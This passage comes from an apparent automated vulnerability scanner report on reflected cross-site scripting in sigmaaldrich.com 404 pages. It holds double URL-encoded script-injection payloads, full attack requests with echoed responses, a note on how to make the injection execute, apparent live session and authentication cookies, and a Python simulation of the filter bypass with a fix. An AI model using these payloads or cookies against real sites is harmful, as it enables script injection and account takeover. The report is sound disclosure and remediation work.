Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content2a356%2522%253balert%25281%2529%252f%252f72b398ea8f/sigma-aldrich/site-level/privacy-policy HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:15 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content2a356";alert(1)//72b398ea8f/sigma-aldrich/site-level/privacy-policy","E404") ;
   </script>
...[SNIP]...

1.215. http://www.sigmaaldrich.com/content/sigma-aldrich/site-level/privacy-policy [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/site-level/privacy-policy

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb9a%2522%253balert%25281%2529%252f%252f0680ae16661 was submitted in the REST URL parameter 2. This input was echoed as feb9a";alert(1)//0680ae16661 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichfeb9a%2522%253balert%25281%2529%252f%252f0680ae16661/site-level/privacy-policy HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:16 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichfeb9a";alert(1)//0680ae16661/site-level/privacy-policy","E404") ;
   </script>
...[SNIP]...

1.216. http://www.sigmaaldrich.com/content/sigma-aldrich/site-level/privacy-policy [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/site-level/privacy-policy

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 921fc%2522%253balert%25281%2529%252f%252f87a750f4051 was submitted in the REST URL parameter 3. This input was echoed as 921fc";alert(1)//87a750f4051 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/site-level921fc%2522%253balert%25281%2529%252f%252f87a750f4051/privacy-policy HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:18 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/site-level921fc";alert(1)//87a750f4051/privacy-policy","E404") ;
   </script>
...[SNIP]...

1.217. http://www.sigmaaldrich.com/content/sigma-aldrich/site-level/privacy-policy [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/site-level/privacy-policy

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2011%2522%253balert%25281%2529%252f%252f1d4c5be287d was submitted in the REST URL parameter 4. This input was echoed as b2011";alert(1)//1d4c5be287d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character. The response confirms that the value is percent-decoded twice: the submitted %2522 arrives in the script as a literal double quote, which closes the string literal. As echoed, the statement reads cmCreateErrorTag("Error 404 | ...";alert(1)//... with the call's argument list left open, so this exact proof-of-concept is a JavaScript syntax error rather than an executed alert; the string context is broken all the same, and closing the call before the injected statement (a payload beginning ");) uses only characters the double-encoding is already shown to carry.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. The 404 page that carries the reflection is generated by the origin behind the redirect: its response names that host on port 4402 in its own Host header, and the echoed URL carries the same port, so the reflected string is not visible in the first response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. Here the sink is the site's 404 template, which splices the requested URL into the first argument of cmCreateErrorTag() inside a double-quoted JavaScript string, so any path that produces a 404 reaches it. If at all possible, the application should avoid echoing user data within this context; where the URL must be passed to the error tag, it should be encoded for a JavaScript string literal at the point of output (every character outside [A-Za-z0-9] as a \xHH or \uHHHH escape), so that a quote can neither terminate the literal nor a </script> sequence end the block. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4, as the web server will already have carried out one decode; removing that second decode is what closes the double-encoding bypass. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and a path that would still change under a further decode should be rejected rather than decoded again.
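The decode chain behind this finding, as an added example that is not code from the report or from the site: the web server's decode turns %2522 into %22, which passes a blacklist looking for a literal quote; the application's second decode then turns %22 into " as it builds the cmCreateErrorTag() call. The request path and the echoed origin are taken from the request and response above; the blacklist, the template and the function names are assumptions that reproduce the observed behaviour. The hardened variant drops the second decode, encodes the value for a JavaScript string literal, and includes the post-canonicalisation check the remediation text asks for.

```python
from urllib.parse import unquote

# Request path and origin taken from issue 1.217 above; the filter and the template
# are assumptions that reproduce the observed behaviour, not the site's real code.
REQUEST_PATH = ("/content/sigma-aldrich/site-level/privacy-policy"
                "b2011%2522%253balert%25281%2529%252f%252f1d4c5be287d")
ORIGIN = "http://www.sigmaaldrich.com:4402"   # scheme, host and port echoed in the 404 page
BLOCKED = set('"\'<>;')                       # assumed blacklist applied to the decoded path


def web_server_decode(raw_path: str) -> str:
    """The one percent-decode the web server performs before the application sees the path."""
    return unquote(raw_path)


def naive_filter(once_decoded: str) -> bool:
    """Assumed blacklist: accept the request only if no blocked character is present."""
    return not any(c in BLOCKED for c in once_decoded)


def still_encoded(once_decoded: str) -> bool:
    """Check to run after canonicalisation: a value that changes under a further decode
    is carrying double-encoded data and can be rejected outright."""
    return unquote(once_decoded) != once_decoded


def render_error_tag_vulnerable(once_decoded: str) -> str:
    """The observed sink: a second URL-decode, then raw splicing into a JS string literal."""
    url = ORIGIN + unquote(once_decoded)
    return 'cmCreateErrorTag("Error 404 | ' + url + '","E404") ;'


def js_string_escape(value: str) -> str:
    """Encode for a double-quoted JavaScript string literal: only [A-Za-z0-9] pass through,
    everything else becomes \\xHH (code points below 256) or \\uHHHH. No quote, backslash,
    newline or '<' survives, so the value can end neither the literal nor the script block."""
    out = []
    for ch in value:
        cp = ord(ch)
        if cp < 128 and ch.isalnum():
            out.append(ch)
        elif cp < 256:
            out.append(f"\\x{cp:02x}")
        else:
            out.append(f"\\u{cp:04x}")
    return "".join(out)


def render_error_tag_fixed(once_decoded: str) -> str:
    """Hardened sink: no second decode, and output encoding for the JS string context."""
    url = ORIGIN + once_decoded
    return 'cmCreateErrorTag("Error 404 | ' + js_string_escape(url) + '","E404") ;'


def trace(raw_path: str) -> dict:
    """Run one request path through both versions of the pipeline."""
    once = web_server_decode(raw_path)
    return {
        "after_server_decode": once,
        "filter_passed": naive_filter(once),
        "double_encoded_input": still_encoded(once),
        "vulnerable": render_error_tag_vulnerable(once),
        "fixed": render_error_tag_fixed(once),
    }


if __name__ == "__main__":
    for label, path in (("double-encoded (report)", REQUEST_PATH),
                        ("single-encoded", REQUEST_PATH.replace("%25", "%"))):
        t = trace(path)
        print(f"{label}: filter passed={t['filter_passed']}, "
              f"double-encoded input={t['double_encoded_input']}")
        print("  vulnerable:", t["vulnerable"])
        print("  fixed:     ", t["fixed"])
```

Run as a script it prints both renderings for the report's path and for the same payload single-encoded, which the assumed filter stops. The escaping routine is context-specific: it is correct for a value inside a double-quoted JavaScript string literal and nothing else; the same value written into HTML text or an attribute needs HTML encoding instead.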

Request

GET /content/sigma-aldrich/site-level/privacy-policyb2011%2522%253balert%25281%2529%252f%252f1d4c5be287d HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:19 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/site-level/privacy-policyb2011";alert(1)//1d4c5be287d","E404") ;
   </script>
...[SNIP]...

1.218. http://www.sigmaaldrich.com/content/sigma-aldrich/technical-service/technical-service-home/enews-subscription [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/technical-service/technical-service-home/enews-subscription

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf095%2522%253balert%25281%2529%252f%252f236ed0f1918 was submitted in the REST URL parameter 1. This input was echoed as cf095";alert(1)//236ed0f1918 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character. The response confirms that the value is percent-decoded twice: the submitted %2522 arrives in the script as a literal double quote, which closes the string literal. As echoed, the statement reads cmCreateErrorTag("Error 404 | ...";alert(1)//... with the call's argument list left open, so this exact proof-of-concept is a JavaScript syntax error rather than an executed alert; the string context is broken all the same, and closing the call before the injected statement (a payload beginning ");) uses only characters the double-encoding is already shown to carry.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. Here the sink is the site's 404 template, which splices the requested URL into the first argument of cmCreateErrorTag() inside a double-quoted JavaScript string, so any path that produces a 404 reaches it. If at all possible, the application should avoid echoing user data within this context; where the URL must be passed to the error tag, it should be encoded for a JavaScript string literal at the point of output (every character outside [A-Za-z0-9] as a \xHH or \uHHHH escape), so that a quote can neither terminate the literal nor a </script> sequence end the block. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will already have carried out one decode; removing that second decode is what closes the double-encoding bypass. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and a path that would still change under a further decode should be rejected rather than decoded again.

Request

GET /contentcf095%2522%253balert%25281%2529%252f%252f236ed0f1918/sigma-aldrich/technical-service/technical-service-home/enews-subscription HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; 